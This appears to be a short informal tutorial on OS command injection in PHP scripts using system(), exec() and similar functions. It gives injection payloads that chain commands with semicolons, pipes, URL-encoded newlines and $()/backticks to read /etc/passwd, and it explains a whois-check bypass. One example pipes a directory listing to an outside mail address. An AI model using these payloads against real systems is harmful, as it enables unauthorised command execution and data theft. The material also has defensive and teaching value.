OS Command Injection

OS Command Injection

OS Command Injection is a vulnerability where you can implant shell commands in a script which will be executed by the current user (in the best case: root). Mostly this type of vulnerability comes up in php scripts who works with (for example) one of this functions:

system(), passthru(), exec() or shell_exec()

How can I exploit these vulnerability?

Firstly you need to understand few things about the unix-shell.

the unix-shell requires different chars or metachars to execute particular commands in a row.

Here are some examples:

semicolon ;

execution: "ls;id"

result: display current directory and user id

pipe |

execution: "ls|mail test@provider.com" 

result: send a mail of the current directory to test@provider.com

metachars `` $()

Now you have different ways to implant commands through the script over a input or a parameter in the url:

;cat /etc/passwd
cat /etc/passwd
&&cat /etc/passwd
%0acat /etc/passwd

this examples will display us the file /etc/passwd.

In the most cases the website will check our input:

"cat /etc/passwd" will not work but

"cat /etc/passwd.com" will be executed (because the script requires a domain ending for the whois check)

to view /etc/passwd we only need to set a semicolon or pipe behind the command.

if you use shell-metachars, the command between the chars will be executed.

for example:

$(cat /etc/passwd)
`cat /etc/passwd`

I hope you can read my dirty english.

Additionally I will add a topic about blind os command injection soon.